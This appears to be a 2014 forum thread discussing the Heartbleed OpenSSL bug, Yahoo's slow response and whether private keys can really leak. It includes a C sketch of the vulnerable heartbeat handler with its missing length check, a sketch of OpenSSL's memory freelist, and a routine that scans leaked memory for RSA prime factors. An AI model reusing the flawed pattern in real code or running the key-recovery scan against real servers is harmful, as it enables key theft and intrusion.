Heartbleed OpenSSL Bug

That is such a bullshit statement.

“Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.”

Most normal companies have a 3-year life cycle max, with regular software maintenance/patching as part of vulnerability management.

It’s not like other companies haven’t gotten caught in similar situations; it’s happened to Microsoft, Apple, and everyone else numerous times.

I figured with all the talent Yahoo has sitting around they would come up with some quick mitigation; however, it was vulnerable for an extremely long time yesterday. It’s likely 100,000+ users have had credentials compromised, if not more.

Well, I know that RHEL 5 and CentOS 5 are unaffected due to still running OpenSSL 0.9.8. RHEL 5 is still in support and will be for some time. 3-year life cycles work for some companies with large budgets, but I’m guessing that there are MANY companies out there still running OpenSSL 0.9.8.

I agree it’s a bullshit statement though. Saying, “we’re awesome because we’re running old software” is the biggest cop-out on the planet, and in the bigger picture, you’re in worse shape than the companies affected by Heartbleed.

The amount of time it took to get a mitigation in place was my primary issue.

Running outdated software and accepting the risk while having mitigating controls is fine.

You could yank out hundreds of Yahoo logins in a couple of minutes from mail.yahoo.com yesterday, and that is with zero skill. If someone was more skilled, they could use a memory leak like this to defeat a number of exploit mitigation techniques if they already had a working exploit for Apache or other software.

Sorry your open source software failed you.

agreed

this is kind of a bummer for the open source community, but it was patched and released downstream VERY quickly.

This is just how things happen in open source communities, and it was pretty awesome if you think about it. How long do proprietary bugs take to get patched? A lot longer. People are complaining about this without realizing that software like this is free, and the response to address it was actually pretty awesome.

So apparently you can hit people client side with this.

agreed, 100%

If you read the bug, you can hit anyone, even programs that use OpenSSL if they implement the heartbeat extension. The app dumps memory in 64 KB chunks, so you can essentially capture application keys and data, even Bitcoin private keys from wallets.
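
The underlying flaw is simple enough to sketch. The following is a self-contained, illustrative paraphrase of the bug pattern, not OpenSSL’s literal code (the function name and layout here are my own): the peer echoes back as many bytes as the request claims to contain, never checking how many bytes actually arrived.

#include <stdlib.h>
#include <string.h>

/* record: a received heartbeat message (type, 2-byte claimed length, payload)
 * record_len: how many bytes actually arrived on the wire */
unsigned char *build_heartbeat_response(const unsigned char *record, size_t record_len)
{
    unsigned int claimed_len = (record[1] << 8) | record[2];  /* attacker-controlled, up to 65535 */
    const unsigned char *payload = record + 3;

    unsigned char *resp = malloc(1 + 2 + claimed_len + 16);   /* type + length + payload + padding */
    if (resp == NULL)
        return NULL;

    unsigned char *bp = resp;
    *bp++ = 2;                                                /* heartbeat response */
    *bp++ = claimed_len >> 8;
    *bp++ = claimed_len & 0xff;

    /* BUG: nothing verifies claimed_len <= record_len - 3, so this memcpy
     * reads past the end of the record into adjacent heap memory, and the
     * response leaks up to ~64 KB of it per request. The fix is simply to
     * drop the message when the claimed length exceeds what was received. */
    memcpy(bp, payload, claimed_len);
    (void)record_len;
    return resp;
}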

Update:

For the technical folk, this bug is really interesting.

http://thread.gmane.org/gmane.os.openbsd.misc/211952/focus=211963

> On Tue, Apr 08, 2014 at 15:09, Mike Small wrote:
> > nobody <openbsd.as.a.desktop <at> gmail.com> writes:
> >
> >> “read overrun, so ASLR won’t save you”
> >
> > What if malloc’s “G” option were turned on? You know, assuming the
> > subset of the worlds’ programs you use is good enough to run with that.
>
> No. OpenSSL has exploit mitigation countermeasures to make sure it’s
> exploitable.

What Ted is saying may sound like a joke…

So years ago we added exploit mitigation countermeasures to libc
malloc and mmap, so that a variety of bugs can be exposed. Such
memory accesses will cause an immediate crash, or even a core dump,
then the bug can be analysed, and fixed forever.

Some other debugging toolkits get them too. To a large extent these
come with almost no performance cost.

But around that time OpenSSL adds a wrapper around malloc & free so
that the library will cache memory on its own, and not free it to the
protective malloc.

You can find the comment in their sources …

#ifndef OPENSSL_NO_BUF_FREELISTS
/* On some platforms, malloc() performance is bad enough that you can’t just

OH, because SOME platforms have slow performance, it means even if you
build protective technology into malloc() and free(), it will be
ineffective. On ALL PLATFORMS, because that option is the default,
and Ted’s tests show you can’t turn it off because they haven’t tested
without it in ages.

So then a bug shows up which leaks the content of memory mishandled by
that layer. If the memory had been properly returned via free, it
would likely have been handed to munmap, and triggered a daemon crash
instead of leaking your keys.

OpenSSL is not developed by a responsible team.
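
To make the point concrete, the freelist wrapper Theo is describing boils down to something like this (a simplified sketch of the idea, not the actual OpenSSL code, and ignoring the size bookkeeping the real code does):

#include <stdlib.h>

/* Simplified sketch: freed buffers go onto the library's own list instead
 * of back to the system allocator, and later allocations hand them out
 * again with their old contents intact. */
struct fl_entry {
    struct fl_entry *next;
};
static struct fl_entry *freelist = NULL;

static void *buf_malloc(size_t len)
{
    if (freelist != NULL) {              /* reuse a cached buffer...          */
        void *buf = freelist;
        freelist = freelist->next;
        return buf;                      /* ...stale data and all             */
    }
    return malloc(len);                  /* only occasionally hits the real   */
}                                        /* allocator                         */

static void buf_free(void *buf)
{
    struct fl_entry *e = buf;            /* never reaches free(), so guard    */
    e->next = freelist;                  /* pages or junk-on-free in a        */
    freelist = e;                        /* protective malloc never see the   */
}                                        /* buffer or catch the overread      */

Because the out-of-bounds read lands in one of these recycled buffers rather than in freshly mapped (or unmapped) memory, the overread quietly returns old request data and key material instead of crashing the process.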

I still don’t understand how they’re claiming full recovery of private keys.

Just from messing around, the memory being read in the heap isn’t near the private keys.

Edit: http://blog.erratasec.com/2014/04/why-heartbleed-doesnt-leak-private-key.html#.U0XjDfldXdA
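
For what it’s worth, the recovery approaches people describe amount to scanning each leaked 64 KB chunk for a value that divides the server’s public RSA modulus; if a prime factor happens to sit in leaked memory, the private key falls out. A rough sketch using OpenSSL’s BIGNUM API (illustrative only; the function and variable names are my own):

#include <openssl/bn.h>
#include <stddef.h>

/* Scan a leaked chunk for a prime factor of the RSA modulus n.
 * Returns 1 and fills p_out if some window of bytes divides n. */
int scan_for_factor(const unsigned char *leak, size_t len,
                    const BIGNUM *n, BIGNUM *p_out)
{
    BN_CTX *ctx = BN_CTX_new();
    BIGNUM *cand = BN_new(), *rem = BN_new();
    int plen = BN_num_bytes(n) / 2;          /* e.g. 128 bytes for RSA-2048 */
    int found = 0;
    unsigned char buf[1024];

    for (size_t off = 0; !found && off + (size_t)plen <= len; off++) {
        /* On common little-endian machines the key's BIGNUM bytes sit
         * least-significant-byte first, so flip the candidate window to
         * big-endian for BN_bin2bn. */
        for (int i = 0; i < plen; i++)
            buf[i] = leak[off + plen - 1 - i];
        BN_bin2bn(buf, plen, cand);
        if (!BN_is_odd(cand) || BN_is_one(cand) || BN_is_zero(cand))
            continue;
        BN_mod(rem, n, cand, ctx);           /* does the candidate divide n? */
        if (BN_is_zero(rem)) {
            BN_copy(p_out, cand);
            found = 1;
        }
    }
    BN_free(cand);
    BN_free(rem);
    BN_CTX_free(ctx);
    return found;
}

Of course this only works if a factor actually lands in a leaked chunk, which is exactly what the erratasec post argues is unlikely for a long-running web server.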

Yahoo has completed patching their whole portfolio.

https://help.yahoo.com/kb/SLN24021.html

How do you know if this affects you? I heard some sites aren’t affected.
Wonder if certain bank sites were affected/have fixed it.
I called mine and they said they weren’t affected, but they could be lying to keep me happy.

Great video

Seeing a lot of active exploitation attempts after getting IDS rules loaded into Snort…

https://github.com/musalbas/heartbleed-masstest/blob/master/top1000.txt

http://filippo.io/Heartbleed/

Disclaimer: This scan was performed around April 8, 12:00 UTC. Websites listed
as vulnerable may no longer be vulnerable. This list serves as a snapshot of
vulnerable sites at the time of the scan.

Take the list with a grain of salt; it’s likely that a lot of patching has been done since then. The top 3 are all patched.

I still want to see someone fully recover a complete private key from a web server with actual traffic.

A co-worker of mine had a good point: you’d have to exploit the server RIGHT as the httpd service is starting, since that’s when the private key might be in that part of memory.

You might be able to get it when a process forks

It’s just odd that some security people are running around saying all these private keys are lost.